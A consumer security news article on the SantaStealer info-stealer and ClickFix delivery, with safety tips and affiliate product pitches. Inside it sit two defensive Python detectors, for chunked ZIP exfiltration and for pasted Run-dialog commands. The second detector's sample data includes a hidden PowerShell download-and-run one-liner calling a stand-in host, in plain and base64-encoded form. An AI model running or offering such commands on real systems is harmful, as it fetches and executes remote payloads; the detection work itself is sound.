SantaStealer malware still active, targeting passwords and crypto

A new info-stealing malware is being sold as a service, quietly targeting browsers, crypto wallets, and everyday apps.

Don’t let the name fool you. SantaStealer didn’t pack up and leave after Christmas. It’s still circulating and, if anything, growing more popular. Scammers are always looking for fresh ways to make money in the new year.

One reason it’s spreading so easily is its low barrier to entry. SantaStealer is sold as malware-as-a-service. That means almost anyone can pay a small fee and start targeting people at scale.

Criminals are actively promoting the malware on Telegram and underground hacker forums. Sellers advertise it as a quiet, memory-only info stealer. They claim it can run in the background and grab sensitive data without dropping obvious files onto a computer.

That “memory-only” label sounds scarier than it really is. It doesn’t make the malware invisible. Instead, it leaves fewer traces on the hard drive, which can slow detection. Even so, the promise is appealing to criminals. Saved passwords, active login sessions, and crypto wallets remain some of the easiest and most valuable targets to steal.

SantaStealer and how it actually works

SantaStealer operates as a malware-as-a-service, charging $175 per month for its basic tier and $300 per month for the premium plan. Researchers at Rapid7 say the operation rebrands an earlier project called BluelineStealer, with a Russian-speaking developer pushing toward a wider launch before the end of the year.

Despite bold claims about evading detection, Rapid7’s analysis paints a more grounded picture. The samples they examined were not particularly difficult to analyze and lacked the advanced anti-analysis techniques being advertised, which is good news for us. If it can be detected, security tools have a better chance of removing it before it can do serious damage.

Functionally, SantaStealer is still dangerous. It uses 14 separate data-collection modules that run in parallel, pulling information from browsers, messaging apps like Telegram and Discord, gaming platforms such as Steam, crypto wallet apps and extensions, and even local documents. The malware can also take screenshots of your desktop. Stolen data is written to memory, compressed into ZIP files, and sent out in 10MB chunks to a hardcoded command-and-control server.
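The exfiltration pattern described above (stolen data zipped and pushed out in fixed 10MB chunks to a single hardcoded server) is something a defender can hunt for in proxy or egress logs. The following is an added example, not code from the article or from Rapid7: it parses a constructed log format, groups outbound ZIP POSTs by client and destination host, and raises an alert when a client sends two or more near-exactly-10MB uploads to the same host. The log format, the field order, the 2% size tolerance and the sample addresses (documentation ranges only) are all assumptions of this example.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse

# Constructed sample proxy log (not real traffic). Fields, space-separated:
# timestamp client method url content-type request-bytes
# Hosts use the 203.0.113.0/24 documentation range; nothing here is a real IoC.
SAMPLE_PROXY_LOG = """\
2025-01-06T09:12:01Z 10.0.0.21 POST http://203.0.113.10/api/upload application/zip 10485760
2025-01-06T09:12:04Z 10.0.0.21 POST http://203.0.113.10/api/upload application/zip 10485760
2025-01-06T09:12:07Z 10.0.0.21 POST http://203.0.113.10/api/upload application/zip 4120331
2025-01-06T09:13:00Z 10.0.0.33 GET http://www.example.com/index.html text/html 5120
2025-01-06T09:14:10Z 10.0.0.33 POST https://files.example.com/share application/zip 2048000
"""

LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>\S+) (?P<url>\S+) (?P<ctype>\S+) (?P<bytes>\d+)$"
)
CHUNK_BYTES = 10 * 1024 * 1024   # the 10MB chunk size the article describes
TOLERANCE = 0.02                 # assumed slack for per-request framing overhead


def parse_log(text):
    """Parse the constructed log format into a list of event dicts."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # skip malformed lines rather than crash the detector
        e = m.groupdict()
        e["bytes"] = int(e["bytes"])
        e["host"] = urlparse(e["url"]).hostname
        events.append(e)
    return events


def is_full_chunk(size):
    """True when an upload is within TOLERANCE of exactly one 10MB chunk."""
    return abs(size - CHUNK_BYTES) <= CHUNK_BYTES * TOLERANCE


def find_chunked_uploads(events, min_full_chunks=2):
    """Flag (client, host) pairs that POST repeated full-size ZIP chunks.

    A stealer that zips its loot and ships it in fixed-size pieces shows up as
    several near-identical POSTs to one host. The final piece is usually
    smaller, so only full chunks count toward the threshold.
    """
    groups = defaultdict(list)
    for e in events:
        if e["method"] == "POST" and "zip" in e["ctype"].lower():
            groups[(e["client"], e["host"])].append(e)

    alerts = []
    for (client, host), posts in groups.items():
        full = sum(1 for p in posts if is_full_chunk(p["bytes"]))
        if full >= min_full_chunks:
            alerts.append({
                "client": client,
                "host": host,
                "posts": len(posts),
                "full_chunks": full,
                "total_bytes": sum(p["bytes"] for p in posts),
            })
    return alerts


if __name__ == "__main__":
    for a in find_chunked_uploads(parse_log(SAMPLE_PROXY_LOG)):
        print(f"{a['client']} -> {a['host']}: {a['posts']} ZIP POSTs, "
              f"{a['full_chunks']} full 10MB chunks, {a['total_bytes']} bytes total")
```

On the sample data only the 10.0.0.21 client trips the rule: two exact 10MB chunks plus a smaller trailing one to a single host. The legitimate 2MB file-share upload from 10.0.0.33 does not, because a single sub-threshold ZIP POST is normal user behaviour. In production the content-type check should be treated as a weak signal, since malware can label the body however it likes; the repeated fixed-size chunking to one destination is the stronger part of the pattern.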

One notable capability is its use of an embedded executable to get around Chrome’s App-Bound Encryption, a security feature introduced in mid-2024. This workaround typically requires the malware to be executed at the user level and is not a remote bypass of Chrome’s security model. Similar tricks have already been used by other info-stealers, showing how quickly attackers test and adapt to new browser protections.

Image: SantaStealer pricing (source: Rapid7)

What this says about the current threat landscape

SantaStealer is not fully operational yet and has not been distributed at scale, but it reflects a broader trend in cybercrime. Modern info-stealers are modular, configurable, and sold much like regular software. The affiliate panel that Rapid7 observed allows buyers to fine-tune exactly what data the malware steals, from full system sweeps to narrowly targeted attacks focused on specific apps or crypto wallets.

The malware also includes options to avoid infecting systems in certain regions and to delay execution, which can throw off both victims and security analysts. As for how SantaStealer might spread, researchers say recent campaigns increasingly rely on ClickFix-style attacks. These tricks push victims into pasting malicious commands directly into the Windows terminal, often disguised as steps to fix an issue or enable a feature.

More traditional methods are still very much in play. Phishing emails, pirated software, torrent downloads, malicious ads, and even deceptive YouTube comments remain effective delivery channels. Once malware like this runs on a system, it needs very little time to grab saved passwords, session cookies, and wallet data that can later be abused or sold.

7 steps you can take to stay safe from SantaStealer malware

A few sensible habits and the right tools can significantly reduce your risk, even if malware like this continues to evolve. Here are seven practical steps you can take to stay safe:

1) Use strong antivirus software

Modern antivirus tools don’t just look for known malware signatures. They also monitor suspicious behavior, such as programs trying to grab browser data or run hidden processes. Keep real-time protection enabled and take alerts seriously instead of dismissing them.

The best way to safeguard yourself from malicious links that install malware and expose your private information is to have strong antivirus software installed on all your devices. It can also alert you to phishing emails and ransomware scams, helping keep your personal information and digital assets safe.

2) Keep your operating system and apps updated

Updates are not just about new features. They often patch security flaws that malware actively targets. This includes your OS, browser, browser extensions, crypto wallet apps, and messaging tools. Delaying updates gives attackers a wider window to exploit known weaknesses.

3) Switch to a password manager

Info-stealers love browser-saved passwords because they are easy to grab. A password manager stores your credentials in an encrypted vault and reduces what your browser keeps locally. It also helps you use strong, unique passwords for every service without having to remember them.

Next, see if your email has been exposed in past breaches. Our #1 pick, NordPass, includes a built-in breach scanner that checks whether your email address or passwords have appeared in known leaks. If you discover a match, immediately change any reused passwords and secure those accounts with new, unique credentials.

4) Turn on two-factor authentication wherever possible

Even if your password is stolen, 2FA can stop attackers from getting in. App-based authenticators are more secure than SMS codes and should be your first choice for email, crypto exchanges, cloud services, and social media accounts.

5) Be extremely careful with commands and “quick fixes”

ClickFix-style attacks rely on trust and urgency. If a website, pop-up, or video tells you to paste a command into the Windows terminal to fix something, stop. Unless you fully understand what that command does, assume it is dangerous.
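The ClickFix lures described in this step and in the threat-landscape section above leave a trace: whatever the victim pastes into the Win+R box is recorded under the RunMRU key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU). The following added example, which is not code from the article or from Rapid7, scores exported RunMRU values for the habits of pasted one-liners (hidden window, no profile, encoded or download-and-run commands) and decodes any base64 -EncodedCommand payload so its contents are scored too. The sample entries are constructed, the URL uses a documentation address range, the indicator list and the two-indicator threshold are this example's own choices, and reading the registry itself is left out: the function takes values that have already been exported.

```python
import base64
import re

# Scripting hosts and helpers that ClickFix-style lures typically ask the victim to run.
LOLBINS = re.compile(r"\b(powershell|pwsh|mshta|cmd|wscript|cscript|certutil)\b", re.I)

# Each indicator is a habit of pasted one-liners, not of ordinary Run-dialog use.
# The list is an assumption of this example, not a vendor signature set.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
    "no_profile": re.compile(r"-no(?:p|profile)\b", re.I),
    "bypass_policy": re.compile(r"-e(?:p|xecutionpolicy)?\s+bypass\b", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand|c)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    "download_cradle": re.compile(
        r"\b(?:iwr|invoke-webrequest|downloadstring|downloadfile|bitsadmin)\b", re.I),
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "url": re.compile(r"https?://\S+", re.I),
}
ENCODED_RE = re.compile(r"-e(?:nc|ncodedcommand|c)?\s+([A-Za-z0-9+/=]{16,})", re.I)

# Constructed RunMRU values (not from a real machine). The URL uses the
# 198.51.100.0/24 documentation range. Values keep the "\1" suffix that
# Windows appends to each RunMRU entry, exactly as they would be exported.
ENCODED_SAMPLE = base64.b64encode(
    "iex (iwr http://198.51.100.7/a)".encode("utf-16-le")).decode("ascii")

RUN_HISTORY = {
    "a": "notepad\\1",
    "b": 'powershell -w hidden -nop -c "iex (iwr http://198.51.100.7/f)"\\1',
    "c": f"powershell -enc {ENCODED_SAMPLE}\\1",
    "d": "cmd /c dir\\1",
    "e": "powershell Get-Date\\1",
}


def decode_encoded_command(cmd):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or "" if absent/invalid."""
    m = ENCODED_RE.search(cmd)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def analyze_entry(raw):
    """Strip the trailing \\1 from a RunMRU value and score the command it holds."""
    cmd = raw[:-2] if raw.endswith("\\1") else raw
    # Score both the visible command and whatever an encoded payload decodes to.
    texts = [cmd, decode_encoded_command(cmd)]
    found = sorted({name for t in texts if t
                    for name, rx in INDICATORS.items() if rx.search(t)})
    lolbin = bool(LOLBINS.search(cmd))
    # A scripting host plus two or more indicators is the alert bar;
    # a bare "powershell Get-Date" or "cmd /c dir" stays quiet.
    return {"command": cmd, "lolbin": lolbin, "indicators": found,
            "flagged": lolbin and len(found) >= 2}


def scan_run_history(entries):
    """Return {value_name: indicators} for every flagged RunMRU entry."""
    flagged = {}
    for name, raw in entries.items():
        result = analyze_entry(raw)
        if result["flagged"]:
            flagged[name] = result["indicators"]
    return flagged


if __name__ == "__main__":
    for name, inds in scan_run_history(RUN_HISTORY).items():
        print(f"RunMRU value {name}: {', '.join(inds)}")
```

Entries b and c are the ones that should light up: b carries the hidden-window, no-profile, download and invoke-expression habits in the clear, while c hides the same behaviour behind an encoded command that the decoder exposes. The decoded text is scored alongside the raw command precisely because a plain string match on the visible value would miss it. On a real host, RunMRU is only one artefact; the same scoring applies to PowerShell script-block logs and command-line telemetry from EDR, which catch pastes that went into a terminal window rather than the Run box.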

6) Use a personal data removal service

When your email, phone number, or other personal details are widely available online, attackers can target you more convincingly. Personal data removal services help take your information down from data broker sites, reducing the chances of targeted phishing or malware lures.

While no service can guarantee complete removal of your data from the internet, a data removal service is a smart choice. They aren’t cheap, but neither is your privacy. These services do the work for you by actively monitoring and systematically erasing your personal information from hundreds of websites. It’s what gives me peace of mind and has proven to be the most effective way to erase your personal data from the internet. By limiting the information available, you reduce the risk of scammers cross-referencing data from breaches with information they might find on the dark web, making it harder for them to target you.

7) Avoid pirated software and unverified extensions

Cracked software, torrents, and shady browser extensions remain some of the most reliable malware delivery methods. They often bundle info-stealers that run quietly in the background. Stick to official app stores, trusted developers, and verified extensions, even if it means skipping a “free” download.


Kurt’s key takeaway

SantaStealer may not yet live up to its own hype, but that should not make you complacent. Early-stage malware often improves quickly once developers patch obvious mistakes. Be cautious with links and attachments from unfamiliar emails, and think twice before running unverified code or browser extensions pulled from public repositories.

When was the last time you checked which extensions have access to your data? Let us know in the comments below.

Copyright 2025 CyberGuy.com. All rights reserved. CyberGuy.com articles and content may contain affiliate links that earn a commission when purchases are made.